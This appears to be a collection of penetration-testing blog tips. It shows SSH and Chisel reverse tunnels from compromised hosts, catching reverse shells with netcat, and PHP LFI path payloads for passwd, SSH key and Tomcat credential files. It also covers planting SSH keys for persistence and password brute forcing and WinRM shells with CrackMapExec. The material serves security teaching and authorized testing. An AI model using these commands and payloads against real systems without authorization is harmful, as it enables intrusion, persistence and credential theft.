Tips & Tricks

Port Forwarding Through SSH Connections

There are multiple ways to configure SSH for port forwarding, and this post intends to serve as a handy cheatsheet that you can reference the next time you need this functionality.


When SSH is Already Established

If you already have an SSH connection up, you can insert SSH command mode by typing the following on a new line:
~C

Then you can issue the following command to configure a local port forward.
-L <attackerPort>:127.0.0.1:<localPort>

For example, let’s say you’re connected to a machine via SSH and find that a webserver is running on port 52846, but only allows local connections. You can run the following command to forward port 9002 from your Kali machine through the SSH connection and access the webserver.
-L 9002:127.0.0.1:52846

Now going to http://localhost:9002 will redirect through the tunnel and display the webpage that is listening on the remote system on port 52846.

Tips & Tricks

Improving Windows PowerShell Reverse Shells For Up/Down Arrows

When you use Netcat to catch a PowerShell reverse shell, like Nishang, you’ll notice that you won’t have the ability to use up/down arrow keys. This could be a huge pain when you’re stuck in this type of shell. However, there is a tool that we can leverage that should improve your experience with these type of shells.


To begin, we’ll download and install the tool on our system.
sudo apt install rlwrap -y

Then we’ll set up a log file on our box that will give us the input/output logging.
script reverse.log

Now we can start our Netcat listener.
rlwrap nc -nvlp <listenPort>

Then we’ll issue our exploit to start our reverse shell. Now we should have arrow keys within our Netcat session!

Tips & Tricks

Using Ping TTLs Values to Fingerprint Operating Systems


Using Ping

You can start by pinging your target system.

ping <targetIP>

Take a look at the returned TTL value. As long as you’re able to ping the host directly without going through dozens of hops, the returned TTL should give you a hint as to what OS the system is running.

  • Windows by default will return a value near 32 or 128.
  • Linux by default will return a value near 63 or 64.

The TTL value will decrease by one for every hop that it takes. You can always run a tracert against the target to make note of the number of hops if you’re ever in doubt.

You can find more details of other operating system at https://subinsb.com/default-device-ttl-values/

Tips & Tricks

Tunneling Through Windows Machines with Chisel

Chisel is an application that makes port forwarding simple when you’re going against a Windows host. This is especially useful in instances where there is a service running and only available on the loopback interface of a compromised Windows computer. Using Chisel in a setup like this will allow you to use any tools you have installed on Kali Linux, through the tunnel, against the loopback interface of the Windows machine.


To download Chisel, head over to the following Github page:
https://github.com/jpillora/chisel/releases/tag/v1.7.3

You’ll need to download a version for Linux to use from Kali, and another version for Windows to use on the target system.

Next, you’ll want to unzip the files.
gunzip -d *.gz

Then you’ll want to transfer the Windows version of the file to your target system using whatever method you’d like. For help with this, see my Windows File Transfer Cheatsheet.

Back on our Kali machine, we’ll make the application executable. Note: Your filename may be different than mine.
chmod +x chisel

Now we’ll start up Chisel in server mode, since we want the Windows box to connect back to us.
./chisel server --reverse --port 9002

Then on the Windows machine, you’ll run a command similar to the one below. The following command will instruct Chisel to connect back to the Kali machine on port 9002. Once connected, we’ll forward any traffic sent to port localhost port 3306 to port 3306 on the Windows machine. The 2nd entry does the same thing, but for port 8888.
.\chisel.exe client <kaliIP>:9002 R:3306:localhost:3306 R:8888:localhost:8888

Now we can confirm that we’re able to connect to port 3306 of the Windows machine, through the tunnel, from the Kali machine.
nc localhost 3306

Tips & Tricks

How to Route Public Python Exploit Code Through Burp Suite

When you come across public exploit code written in Python, it is sometimes easiest to just route the exploit through Burpsuite so you can understand what it’s doing — especially in cases where the code interacts with web applications.

To do this, we can simple add some code that instructs the script to use a proxy.


First, make sure that the Requests module is already being called by the script. Check for the following line of code:
import requests

As long as that is present, we can add a Proxy variable at the top of the exploit, but after the Requests module is imported. If the application uses HTTPS instead of HTTP, then you’d want to use https in the below line.
proxies = {'http': 'http://127.0.0.1:8080'}

Next, we need to look through the code for any .get or .post requests and add the following to the end of it.
, proxies=proxies

For example, let’s say you have a line of code that looks like this:
s.get(SERVER_URL, verify=False)

You will want to modify it so that it looks like this:
s.get(SERVER_URL, verify=False, proxies=proxies)

Just make sure to do this throughout the entire exploit. The easiest way to find them all may be to search for “requests” and look for any time a .get or .post is added to that.

Now you can spin up Burp Intercept and run the exploit! This will allow you to interact with the exploit through Burp and gives you much more visibility into the requests being made.

Tips & Tricks

Extracting Password Policy From Domain Machines

Before you start a Password Spraying or Brute Force attack, you always want to check what the password policy is first so you don’t start locking accounts out. This post intends to serve as a guide that lists a handful of ways to enumerate this.


Using CrackMapExec:

crackmapexec smb <targetIP> --pass-pol

If that doesn’t work, you can attempt again with a null authentication attempt by using the following. This typically works when a domain has been upgraded from 2003:

crackmapexec smb <targetIP> --pass-pol -u '' -p ''


Using Enum4Linux:

enum4linux <targetIP>


Using RPCClient:

If the below works, then we may be able to utilize RPC commands to extract details about the user and password policies.

rpcclient -U '' <targetIP>


Using PowerShell:

https://docs.microsoft.com/en-us/powershell/module/addsadministration/get-addefaultdomainpasswordpolicy?view=win10-ps

Tips & Tricks

Exploiting PHP Based LFI


Different PHP Methods

There are two different methods that will create an LFI if not used correctly. Those two are:

file_get_contents() – This is going to just display the text within the file by reading the contents as a string, and will not interpret PHP code for execution. If the LFI is using this method, you can only enumerate files on the filesystem.

include() – This is going to execute everything within the PHP tag as actual PHP code. If the LFI is using this method, then we SHOULD be able to get command execution.

You can tell which method is being used by using the LFI to read the PHP file that causes the LFI.

  • If the source code IS displayed, then the PHP code was interpreted by the server and you have a file_get_content() LFI.
  • If the code is NOT displayed, then you have an include().

Example: Say your request looks like this:

GET /news.php?file=../news.php

Because the source code is visible in the response, we can assume we’re working with a file_get_content() LFI with no possibility of code execution.


Files to check while enumerating LFI:

../../../../../../../etc/passwd
../../../../../../../home/<users>/.ssh/authorized_keys
../../../../../../../home/<users>/.ssh/bash_history

To get the username of who we’re running as:
../../../../../../../proc/self/environ

To see what binary is running this service:
../../../../../../../proc/self/cmdline

If you have Tomcat running as well, you may want to enumerate these:

../../../../../../../usr/share/tomcat9/bin/catalina.sh
../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml
../../../../../../../usr/share/tomcat9/conf/tomcat-users.xml

Note: Make sure to adjust the version number located in the path.

Tips & Tricks

Dropping SSH Keys on Compromised Linux Hosts

Once you have a reverse shell, you may want to consider dropping a SSH key so that you can return at a later time. This guide intends to serve as a quick tutorial on how to do this.


From the Compromised Remote Host:

Navigate to and/or create the following directory.

/home/<user>/.ssh

Change into it, and then run the following command.

ssh-keygen -f id_rsa

This should generate a private key along with a public key. You’ll want to create an “authorized_keys” file by running the following command.

cat id_rsa.pub > authorized_keys

Then you’ll want to take your private key to your local system by running the following command and copying the contents.

cat id_rsa


On Your Local System:

Create a new file by running the following command and pasting the contents of your clipboard.

vi id_rsa

Then make the appropriate file permissions changes.

chmod 600 id_rsa

That’s it! You should now be able to SSH in.

ssh user@targetIP

Tips & Tricks

Quickly Formatting Nmap Output to Comma Separate Open Ports

There are times where you want to run a quick Nmap scan to see what ports are open, and then rerun a more in-depth Nmap scan on those specific ports. Doing it this way will allow you to lessen the amount of time it takes to run the scan, as you aren’t wasting time trying to run Nmap scripts or enumerate version information on ports that aren’t open.

Your initial scan make look something like this.

sudo nmap -p- <target> -oA nmap/quick

You can then run the following to retrieve a command separated list of open ports you can copy/paste to your next command.

cat nmap/quick | grep open | awk -F/ '{print $1}' ORS=','; echo

Tips & Tricks

Getting Shells With CrackMapExec

I love CrackMapExec. Seriously, it’s one of my favorite tools to use for internal Active Directory pentesting. Once you find valid credentials, you can throw it into this tool to pass it around the network and see where else those creds are valid. Let’s say you find a password within a log file, but don’t know what username its for? CrackMapExec will tell you. Let’s say you compromise a machine and dump the SAM database and are curious what other machines the hashes might be valid on? CrackMapExec will tell you.

This post intends to serve as a guide for some additional things that I’ve learned about CrackMapExec, that I want to remember in the future. This is far from a comprehensive list of what the tool can do, but it will be updated over time.


Mass Execution of Commands

Let’s say you’ve captured elevated credentials for a user that is admin on multiple machines across the domain. You can use the -c flag to execute commands.

I made a post that used this feature of CME to mass deploy Covenant launchers. You can check that out at Using CrackMapExec to Install Covenant C2 Launchers.


Brute Forcing

This tool is extremely useful for many use cases, but did you know it can also perform brute force attacks?

Let’s create a user list along with a password list. Then we can just feed it to CME with the following syntax.

crackmapexec smb <target> -u <users.txt> -p <passwords.txt> --continue-on-success

Note: Be careful when doing this, as you will lock out users if there is a password policy in place.


Don’t Sleep on WinRM

Once you’ve found valid credentials, CrackMapExec’s SMB function will only display “Pwn3d” if the user is a local administrator. However, there is another function that you can try instead.

crackmapexec winrm <target> -u <user> -p <password>

If this returns Pwn3d, then you can leverage EvilWinRM to get the shell.

evil-winrm -i <target> -u <username> -p <password>